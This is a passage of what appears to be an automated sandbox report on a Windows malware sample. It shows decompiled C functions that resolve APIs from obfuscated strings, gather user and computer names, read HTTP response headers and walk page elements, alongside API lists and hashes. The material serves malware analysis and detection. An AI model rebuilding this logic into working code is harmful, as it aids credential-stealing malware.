                            0x006d3c77
                            0x006d3d0e
                            0x006d3d17
                            0x006d3d1b
                            0x00000000

                            APIs
                              • Part of subcall function 006D2AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,006D3C0C,?,?,?,?,00000000,00000000), ref: 006D2ACB
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 006D2AED
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 006D2B03
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 006D2B19
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 006D2B2F
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 006D2B45
                            • memset.NTDLL ref: 006D3C5A
                              • Part of subcall function 006D3A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,006D3C73,73797325), ref: 006D3A23
                              • Part of subcall function 006D3A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 006D3A3D
                            • GetModuleHandleA.KERNEL32(4E52454B,014A8CE7,73797325), ref: 006D3C90
                            • GetProcAddress.KERNEL32(00000000), ref: 006D3C97
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3CFF
                              • Part of subcall function 006D2058: GetProcAddress.KERNEL32(36776F57,006D58B5), ref: 006D2073
                            • CloseHandle.KERNEL32(00000000,00000001), ref: 006D3CDC
                            • CloseHandle.KERNEL32(?), ref: 006D3CE1
                            • GetLastError.KERNEL32(00000001), ref: 006D3CE5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                            • String ID:
                            • API String ID: 3075724336-0
                            • Opcode ID: e0574df71f4952e633a0f14ad726283faa2db324f61d2d543bc4fe9a1dd9bab7
                            • Instruction ID: 29bffde807debdf4759539c87e941e55a2cf7f89dd95f89799664c3921f6bd9d
                            • Opcode Fuzzy Hash: e0574df71f4952e633a0f14ad726283faa2db324f61d2d543bc4fe9a1dd9bab7
                            • Instruction Fuzzy Hash: 13314F72C00219AFDB10AFA5DC89EAEBBBAEF08344F15446AE505E7321D7309E45CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D4E4D Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D4E4D(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E006D7A71(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E006D789E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E006D2129( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                            0x006d4e4d
                            0x006d4e4d
                            0x006d4e5d
                            0x006d4e60
                            0x006d4e64
                            0x006d4e6a
                            0x006d4e6f
                            0x006d4e88
                            0x006d4e9c
                            0x006d4ea3
                            0x006d4eaa
                            0x006d4efd
                            0x006d4f03
                            0x006d4f09
                            0x006d4f44
                            0x006d4f4a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4f09
                            0x006d4eb0
                            0x00000000
                            0x006d4eb7
                            0x006d4ec5
                            0x006d4ec8
                            0x006d4ecb
                            0x006d4ed7
                            0x006d4edb
                            0x006d4f3d
                            0x006d4edd
                            0x006d4eef
                            0x006d4f2d
                            0x006d4f38
                            0x006d4ef1
                            0x006d4ef4
                            0x006d4ef8
                            0x006d4ef8
                            0x006d4eef
                            0x00000000
                            0x006d4edb
                            0x006d4eb0
                            0x006d4e74
                            0x006d4e7a
                            0x006d4e7d
                            0x006d4e82
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4f12
                            0x006d4f1a
                            0x006d4f1f
                            0x006d4f22
                            0x00000000

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 006D4E64
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D4E74
                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 006D4EA6
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4ECB
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4EEB
                            • GetLastError.KERNEL32 ref: 006D4EFD
                              • Part of subcall function 006D2129: WaitForMultipleObjects.KERNEL32(00000002,006D7C1D,00000000,006D7C1D,?,?,?,006D7C1D,0000EA60), ref: 006D2144
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • GetLastError.KERNEL32(00000000), ref: 006D4F32
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 3369646462-0
                            • Opcode ID: 7d8d77f4314e8d86bef9c3c5628921e42b7a05075b066be07520567c4b97a4c8
                            • Instruction ID: 737016f641b34926c5ab7a9f05bb2715bf6fecceb95d202dfea37754cd5f130b
                            • Opcode Fuzzy Hash: 7d8d77f4314e8d86bef9c3c5628921e42b7a05075b066be07520567c4b97a4c8
                            • Instruction Fuzzy Hash: 83310BB5D00349EFDB20DFA5D8849AEBBBABB48344F10496BE502A2351DB309E44DF20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2AA6 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D2AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E006D7A71(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x6da348; // 0xdcd5a8
					_t1 = _t23 + 0x6db11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x6da348; // 0xdcd5a8
					_t2 = _t26 + 0x6db761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E006D789E(_t54);
					} else {
						_t30 =  *0x6da348; // 0xdcd5a8
						_t5 = _t30 + 0x6db74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x6da348; // 0xdcd5a8
							_t7 = _t33 + 0x6db771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x6da348; // 0xdcd5a8
								_t9 = _t36 + 0x6db4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x6da348; // 0xdcd5a8
									_t11 = _t39 + 0x6db786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E006D2156(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                            0x006d2ab5
                            0x006d2ab9
                            0x006d2b7b
                            0x006d2abf
                            0x006d2abf
                            0x006d2ac4
                            0x006d2ad7
                            0x006d2ad9
                            0x006d2ade
                            0x006d2ae6
                            0x006d2aed
                            0x006d2aef
                            0x006d2af4
                            0x006d2b73
                            0x006d2b74
                            0x006d2af6
                            0x006d2af6
                            0x006d2afb
                            0x006d2b03
                            0x006d2b05
                            0x006d2b0a
                            0x00000000
                            0x006d2b0c
                            0x006d2b0c
                            0x006d2b11
                            0x006d2b19
                            0x006d2b1b
                            0x006d2b20
                            0x00000000
                            0x006d2b22
                            0x006d2b22
                            0x006d2b27
                            0x006d2b2f
                            0x006d2b31
                            0x006d2b36
                            0x00000000
                            0x006d2b38
                            0x006d2b38
                            0x006d2b3d
                            0x006d2b45
                            0x006d2b47
                            0x006d2b4c
                            0x00000000
                            0x006d2b4e
                            0x006d2b54
                            0x006d2b59
                            0x006d2b60
                            0x006d2b65
                            0x006d2b6a
                            0x00000000
                            0x006d2b6c
                            0x006d2b6f
                            0x006d2b6f
                            0x006d2b6a
                            0x006d2b4c
                            0x006d2b36
                            0x006d2b20
                            0x006d2b0a
                            0x006d2af4
                            0x006d2b89

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,006D3C0C,?,?,?,?,00000000,00000000), ref: 006D2ACB
                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 006D2AED
                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 006D2B03
                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 006D2B19
                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 006D2B2F
                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 006D2B45
                              • Part of subcall function 006D2156: memset.NTDLL ref: 006D21D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AddressProc$AllocateHandleHeapModulememset
                            • String ID:
                            • API String ID: 1886625739-0
                            • Opcode ID: 61b03412c0d89c1393e5a739d17e19d474aa4c3e33412d789ea2ede95499e068
                            • Instruction ID: 81544117d80934b47da4aad44025f01b6187cfcbdbfb36f618039d4b9ca55d4b
                            • Opcode Fuzzy Hash: 61b03412c0d89c1393e5a739d17e19d474aa4c3e33412d789ea2ede95499e068
                            • Instruction Fuzzy Hash: 5D2139B1D0570BAFD710DF69CC94EAABBEEEB54344712506BE505C7361E7B0E9048BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3ACA Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D3ACA() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x7491c742
						_v12 = _v12 + _t11;
						_t64 = E006D7A71(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E006D789E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x6d3764
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                            0x006d3ad8
                            0x006d3adb
                            0x006d3ade
                            0x006d3ae4
                            0x006d3ae9
                            0x006d3aef
                            0x006d3af7
                            0x006d3afa
                            0x006d3b00
                            0x006d3b05
                            0x006d3b0e
                            0x006d3b12
                            0x006d3b1f
                            0x006d3b23
                            0x006d3b25
                            0x006d3b29
                            0x006d3b2c
                            0x006d3b3c
                            0x006d3b8f
                            0x006d3b90
                            0x006d3b3e
                            0x006d3b43
                            0x006d3b44
                            0x006d3b49
                            0x006d3b4c
                            0x006d3b5f
                            0x00000000
                            0x006d3b61
                            0x006d3b64
                            0x006d3b69
                            0x006d3b77
                            0x006d3b7a
                            0x006d3b80
                            0x006d3b85
                            0x00000000
                            0x006d3b87
                            0x006d3b87
                            0x006d3b8a
                            0x006d3b8a
                            0x006d3b85
                            0x006d3b5f
                            0x006d3b95
                            0x006d3b96
                            0x006d3b05
                            0x006d3b9c

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,006D3762), ref: 006D3ADE
                            • GetComputerNameW.KERNEL32(00000000,006D3762), ref: 006D3AFA
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetUserNameW.ADVAPI32(00000000,006D3762), ref: 006D3B34
                            • GetComputerNameW.KERNEL32(006D3762,7491C740), ref: 006D3B57
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,006D3762,00000000,006D3764,00000000,00000000,?,7491C740,006D3762), ref: 006D3B7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 21bda753f8d3b5b7d704b338016b4aae284eeca0ff75a083c5b86cf61097ba03
                            • Instruction ID: 0df3e6d49b003f0c97e301a6241b2ea9092a2f15bb5718452ed78c33de96fc39
                            • Opcode Fuzzy Hash: 21bda753f8d3b5b7d704b338016b4aae284eeca0ff75a083c5b86cf61097ba03
                            • Instruction Fuzzy Hash: D921C576D00219EFDB11DFE9D989CEEBBBAEE54304B1044ABE501E7340E6309B44DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D262D Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D262D(void* __ecx, WCHAR* _a4, void* _a8) {
				void* _v8;
				int _t14;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t14 = lstrlenW(_a4);
				_t2 =  &_a8; // 0x6d627d
				_t29 = _t14;
				_t25 = lstrlenW( *_t2);
				_t18 = E006D7A71(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}









                            0x006d263d
                            0x006d263f
                            0x006d2642
                            0x006d2646
                            0x006d2650
                            0x006d2655
                            0x006d265a
                            0x006d265c
                            0x006d2664
                            0x006d2669
                            0x006d2677
                            0x006d267c
                            0x006d2686

                            APIs
                            • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,014A93CC,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D263D
                            • lstrlenW.KERNEL32(}bmS,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D2644
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memcpy.NTDLL(00000000,?,74CB69A0,?,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D2664
                            • memcpy.NTDLL(74CB69A0,?,00000002,00000000,?,74CB69A0,?,?,006D627D,004F0053,014A93CC), ref: 006D2677
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID: }bmS
                            • API String ID: 2411391700-3514019255
                            • Opcode ID: ac323df51d2827024acb8b16c149911ca13db0deff87fe6f9370ee51fe3cd00d
                            • Instruction ID: 6c00fe08930e2e4aad446c64074c65edeced642db76e6bc61524d8e3f274ed1a
                            • Opcode Fuzzy Hash: ac323df51d2827024acb8b16c149911ca13db0deff87fe6f9370ee51fe3cd00d
                            • Instruction Fuzzy Hash: EBF03736D00129BB8F11ABA8CC85CDE7BADEF083947054067BA0497312E631EA108BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2D54 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D2D54(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x6da30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x6da2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x6da2f8 = _t6;
					 *0x6da304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x6da2f4 = _t7;
					if(_t7 == 0) {
						 *0x6da2f4 =  *0x6da2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                            0x006d2d5c
                            0x006d2d62
                            0x006d2d69
                            0x00000000
                            0x006d2dc3
                            0x006d2d6b
                            0x006d2d73
                            0x006d2d80
                            0x006d2d80
                            0x006d2dc0
                            0x00000000
                            0x006d2dc0
                            0x006d2d82
                            0x006d2d82
                            0x006d2d87
                            0x006d2d99
                            0x006d2d9e
                            0x006d2da4
                            0x006d2daa
                            0x006d2db1
                            0x006d2db3
                            0x006d2db3
                            0x00000000
                            0x006d2dba
                            0x006d2d7c
                            0x00000000
                            0x00000000
                            0x006d2d7e
                            0x00000000

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,006D72F1,?), ref: 006D2D5C
                            • GetVersion.KERNEL32 ref: 006D2D6B
                            • GetCurrentProcessId.KERNEL32 ref: 006D2D87
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 006D2DA4
                            • GetLastError.KERNEL32 ref: 006D2DC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 28764ad30994eb7aa1302a7353cb4d752cb6a311d8f133c51c4d3fb2559fb60a
                            • Instruction ID: d39fb16d9505fded6ac71396cfdc1152362a48ebcfd644024588cd05931698c2
                            • Opcode Fuzzy Hash: 28764ad30994eb7aa1302a7353cb4d752cb6a311d8f133c51c4d3fb2559fb60a
                            • Instruction Fuzzy Hash: 93F0C230E463039BD7205F66AC29BA43B73AB24B01F14641FE552C63E4D7708581CB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D1335 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 006D1370
                            • SysFreeString.OLEAUT32(00000000), ref: 006D1455
                              • Part of subcall function 006D55F9: SysAllocString.OLEAUT32(006D9284), ref: 006D5649
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 006D14A8
                            • SysFreeString.OLEAUT32(00000000), ref: 006D14B7
                              • Part of subcall function 006D43F6: Sleep.KERNEL32(000001F4), ref: 006D443E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: f1bc74ff0f339d5d92a629a6a9cda2918344d8c544353d63ad6bb16af86b0922
                            • Instruction ID: b149a01bc9d4320545f69e1b0a52c8d0655e44b49961efef5a72f5d801a43b51
                            • Opcode Fuzzy Hash: f1bc74ff0f339d5d92a629a6a9cda2918344d8c544353d63ad6bb16af86b0922
                            • Instruction Fuzzy Hash: 31513A35900609BFDB01CFA8D944AEEB7B7BF89700B15882AE915DB320EB71ED45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D55F9 Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 46%
                            			E006D55F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x6da348; // 0xdcd5a8
					_t5 = _t103 + 0x6db038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x6d9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x6da348; // 0xdcd5a8
												_t28 = _t109 + 0x6db0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x6da348; // 0xdcd5a8
														_t33 = _t79 + 0x6db078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
